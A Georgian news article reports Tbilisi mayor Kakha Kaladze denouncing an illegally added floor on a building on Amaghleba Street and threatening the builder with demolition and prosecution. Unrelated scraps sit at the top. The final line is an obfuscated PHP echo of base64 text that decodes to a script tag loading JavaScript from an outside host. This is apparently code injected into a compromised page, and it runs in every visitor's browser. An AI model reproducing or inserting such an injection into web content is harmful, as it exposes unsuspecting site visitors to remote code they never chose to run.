celsiusi
ავერსი შნაიდერი
თბილისის მერის კახა კალაძის განცხადებით, ვიდრე ის თბილისის მერის თანამდებობას იკავებს, დედაქალაქში უკანონო მშენებლობას არ დაუშვებს.
 
როგორც მან თბილისის მთავრობის დღევანდელ სხდომაზე აღნიშნა, ისტორიულ ზონაში, ამაღლების ქუჩაზე სართულის უკანონოდ დაშენების ფაქტი გამოვლინდა და სამშენებლო კომპანიას მიმართა, მშენებარე ობიექტი სწრაფად მოიყვანოს პროექტთან შესაბამისობაში.
 
კახა კალაძის თქმით, თუ კომპანია დროულად არ განახორციელებს სართულის დემონტაჟს, სამაგალითოდ დაისჯება.
 
„ვიდრე მე ამ ქალაქის მერი ვარ, ვიდრე თბილისის მთავრობას ვხელმძღვანელობ ჩემს თანამშრომლებთან ერთად, უკანონო მშენებლობას არასდროს დავუშვებთ და არ დავუხრით თავს არცერთ ფაქტს, რომელიც გამოვლენილი იქნება. გვაქვს კონკრეტული შემთხვევა ისტორიულ ზონაში, კონკრეტულად, ამაღლების ქუჩაზე, სადაც ერთ-ერთი მშენებლობის დროს სართულის უკანონოდ დაშენების ფაქტი გამოვლინდა. სამუშაოებს კომპანია „მონუმენტმშენი“ აწარმოებს. არ ვიცი, ეს ადამიანები რას ფიქრობენ, რა დამოკიდებულება აქვთ ქალაქთან მიმართებით, ცხადია, როდესაც ასეთ გადაწყვეტილებას იღებ და უკანონოდ ამახინჯებ პროექტს, რომელიც შეთანხმებულია და ერთ სართულს კიდევ ამატებ, არ მინდა ვინმემ იფიქროს, რომ ვიღაცას გაუვა ან ვიღაც რაღაცას გაუტარებს. ამას ძალიან მკაცრი რეაგირება მოჰყვება. რა თქმა უნდა, ყველანაირ ზომებს მივიღებთ და შეიძლება ეს ყველასთვის საჩვენებელი იყოს, თუ არსებული კომპანია, რომელიც დავასახელე, ძალიან მალე არსებულ მშენებლობას არ მოაწესრიგებს“,-განაცხადა კალაძემ.
 
მისი განმარტებით, ასეთი ფაქტი სისხლის სამართლის დანაშაულია.
 
„ეს არის სისხლის სამართლის დანაშაული და ბოლომდე ჩავყვებით. პირადად ვიქნები დაინტერესებული, რომ სამაგალითოდ დაისაჯოს ეს კომპანია და კონკრეტული ადამიანები. მოუწევს სისხლის სამართლის პასუხისგებაში მიცემა, თუ კონკრეტული შენობა-ნაგებობა შესაბამისობაში არ იქნება მოყვანილი. 5-6 სართულიანი შენობა-ნაგებობა უნდა განთავსებულიყო, 2 დონიანი მშენებლობა მიმდინარეობს და ერთი სართული არის დამატებული. ამას ჩვენი სამსახურების მხრიდან შესაბამისი რეაგირება მოჰყვა, გამოწერილია აქტი და კომპანიას მიეცა გაფრთხილება, რომ უმოკლეს ვადაში მოხდეს სართულის დემონტაჟი. ჩვენ ასეთი სამწუხარო შემთხვევა გვქონდა ასევე ბარათაშვილის ქუჩაზეც, სადაც რეაგირება მოყვა და სადემონტაჟო სამუშაოები მიმდინარეობს“,-განაცხადა კალაძემ.
 
მისი შეფასებით, რაც ამ კომპანიამ გააკეთა, „ღორობაა“.
 
„რასაც კომპანია ისტორიულ ზონაში, ამაღლების ქუჩაზე აკეთებს, ამას ჰქვია ღორობა, მეტი არაფერი. შეთანხმებული პროექტი და გადამეტებით მშენებლობა, ერთი სართული დააშენეს. მინდა მუნიციპალური ინსპექციის ხელმძღვანელს, კახა გულედანს მივმართო, რაც შეიძლება სწრაფად განხორციელდეს დემონტაჟი. ჩავყვებით ბოლომდე, ბოლომდე მივიყვანთ, თუ დემონტაჟი არ განხორციელდება, სამაგალითო დასჯის კონკრეტული შემთხვევა იქნება. მე არავის დასჯას არ მივესალმები, მაგრამ ქალაქის აოხრებას და არასწორ ურბანულ განვითარებას არავის ვაპატიებთ. ჩვენ ზუსტად იმიტომ აგვირჩია ხალხმა და იმიტომ გვაქვს ამხელა მხარდაჭერა, რომ ჩვენი ერთ-ერთი დაპირება ქალაქის ურბანული, სწორი განვითარება იყო“,-განაცხადა კალაძემ.
1198
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");